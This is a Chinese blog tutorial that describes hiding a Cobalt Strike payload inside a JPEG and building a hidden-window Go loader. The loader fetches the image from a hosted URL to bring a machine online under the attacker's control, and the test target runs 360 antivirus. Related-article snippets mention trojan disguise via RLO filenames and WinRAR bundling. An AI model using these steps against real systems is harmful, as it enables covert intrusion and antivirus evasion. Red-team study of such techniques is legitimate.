CobaltStrike图片远程上线(实验篇)

最新推荐文章于 2024-07-10 16:14:01 发布
最新推荐文章于 2024-07-10 16:14:01 发布
阅读量391 收藏 3
点赞数
分类专栏: CS 笔记 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjwqp/article/details/126069798
版权
笔记 同时被 2 个专栏收录
18 篇文章 0 订阅
订阅专栏
CS
4 篇文章 0 订阅
订阅专栏

一、实验环境

1.windows7旗舰版64位(安装360)

2.Go语言环境(配置参考上一篇)

3.图片一张(稍微大一点像素的,我选择是1600X2400)

二、配置好CobaltStrike,生成载荷。

 

 

 复制出payload.java的代码payload1到code.go里。

 三、写入文件

打开命令提示符运行:

go run code.go shell.jpg

写入成功后,将shell.jpeg上传到VPS或者服务器(图片不能压缩),修改Loader.go的地址:

imageURL := "http://localhost/shell.jpeg"并保存。

四、测试

go run Loader.go  //本机测试运行

    或者

go build -ldflags="-H windowsgui" Loader.go   //生成Loader.exe文件

go build -ldflags="-H windowsgui" Loader.go

 

 

 测试完成

grn0bmp
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 6956
cobaltstrike之cs上线获取shell
CobaltStrike4.4.zip
09-15
在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关的文件,它们在网络安全测试和防御演练中扮演着重要角色。 首先,`agscript`可能是指Cobalt Strike的Aggressor Script,这是一种...
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
qq_53058639的博客
01-27 1671
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
Cobalt Strike的多种上线提醒方法
crowsec
12-28 1869
在攻防的时候,尤其在钓鱼时,常常需要对Cobalt Strike设置上线提醒,本文将从单用户提醒到多用户提醒,微信提醒到邮件提醒等进行描述。
cobatl strike 的三种上线方法
2301_79328240的博客
12-13 308
将服务端的压缩放在kali里面对文件做一个提权,不然没法使用。
Cobalt Strike exe 木马添加图标
LainWith的博客
01-07 1345
准备ico图标添加图标效果参考 准备ico图标 方案1:直接访问相关网站下载 https://www.easyicon.net/(这个网站支持把PNG转为ico) https://www.iconfont.cn/ 方案2:使用软件提取ico图标 这里使用BeCyIconGrabbe提取图标,这里我把firefox丢到桌面上,然后通过BeCyIconGrabbe指定路径为桌面,然后就可以看到firefox了,之后选择save就能保存了 (提供一个BeCyIconGrabbe的下载地址https://www..
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
CobaltStrike逆向学习系列-主线
02-22
CobaltStrike逆向学习系列-主线】 在网络安全领域,CobaltStrike是一款广泛使用的渗透测试工具,尤其在红队操作和安全研究中扮演重要角色。逆向分析CobaltStrike能帮助我们深入理解其工作原理,为二次开发和...
cobalt strike 4.7
06-07
C2(Command and Control)工具是指远程控制服务器Cobalt Strike 在此领域中扮演了核心角色,提供了一整套的攻击生命周期管理功能。 在Cobalt Strike 4.7版本中,用户可以期待一系列增强和更新,旨在提升效率和...
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序...
geacon:练习Go编程并在Go中实现CobaltStrike的Beacon
03-21
盖康 使用Go来实现CobaltStrike的信标 该项目仅用于学习协议分析和逆向工程,如果有人的权利受到侵犯,请与我联系以删除该项目,最后一个请勿非法使用 怎么玩 设置团队服务器并启动http许可,团队服务器将生成文件.cobaltstrike.beacon_keys 。 使用Jetbrains Idea编译BeaconTool,使用命令java -jar BeaconTool.jar将Java密钥库转换为PEM格式。 将RSA密钥对替换为cmd/config/config.go文件(不需要RSA私钥,我在代码中仅出于记录目的写了它) 无论您要运行什么平台,都可以编译geacon:例如,使用命令export GOOS="darwin" && export GOARCH="amd64" && go build cmd/main.go来编译在MacOS上运行的可执行二进制文件。 正玩得开心
WinRAR捆绑图片,恶意程序并自动上线Cobalt Strike
最新发布
weixin_57176859的博客
07-10 392
CS:Cobalt Strike 一款以由美国redteam团队,研 发出来的一款以Metasploit为基础的GUI框架 式渗透测试工具。1、使用 Unicode 字符修改文件名后缀,右键 - 重命名 - 再次右键 - 插入Unicode - 控制字符 RLO。选择一张jpg格式的图片,选择512*512生成ico图标并生成。选中生成的ico图片和生成的木马——>添加到压缩文件。端口:在CS启动的时候可以看见端口号:50050。用户:为登录之后给别人看的名字,任意写。密码:为之前设置的密码,123。
cobalt strike快速上手指南(二)
awindog的博客
02-19 427
继续功能上的一些体验分享 在cs的shell上线后,就会获取到beacon,然后就有一些功能能够happy了 文件管理 上线后,比较重要的功能就是文件管理功能,文件浏览器,就类似拿到webshell后,能够通过蚁剑等后门管理工具进行文件控制一样,只要在对拿到的回话上右键,Explore -> File Browser就能打开 然后像下面的这些功能 upload -上传 Make Direct...
Cobalt strike 第二节生成报告
weixin_30364325的博客
03-18 106
0x00前言: 上一节我们说了怎么连接到服务器 0x01生成报告: 首先打开Cobalt Strike 点击Cobalt Strike -> Preferences Preferences Perferences设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录 转载于:https://www.cnblogs.com/haq52...
全网最全的Cobalt Strike使用教程-进阶
喜欢Python编程的程序员柚柚呀
08-17 6189
在这文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
热门推荐
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
p69 内网安全-域横向 CobaltStrike&SPN&RDP
weixin_43263566的博客
04-27 1687
p69 内网安全-域横向 CobaltStrike&SPN&RDP
容器docker(CentOS8)开启远程桌面xrdp(显示xterm和xclock)
qq_29060627的博客
02-18 1497
容器docker(CentOS8)开启远程桌面xrdp(显示xterm和xclock)
内网渗透神器CobaltStrike之Beacon详解(三)
xf555er的博客
11-19 1427
这两个beacon的原理是通过发送http请求与受害主机通信来传达命令, 以此实现控制效果优点是传输数据快, 缺点时隐蔽性差, 容易被防火墙或内网审计工具拦截。
CobaltStrike渗透测试指南
"CobaltStrike.pdf - 一关于Cobalt Strike的详细教程文档,主要涵盖其简介、基本使用、模块介绍、脚本使用和扩展功能,特别提到了Malleable C2和External C2等内容。" Cobalt Strike是一款广泛应用于网络安全领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值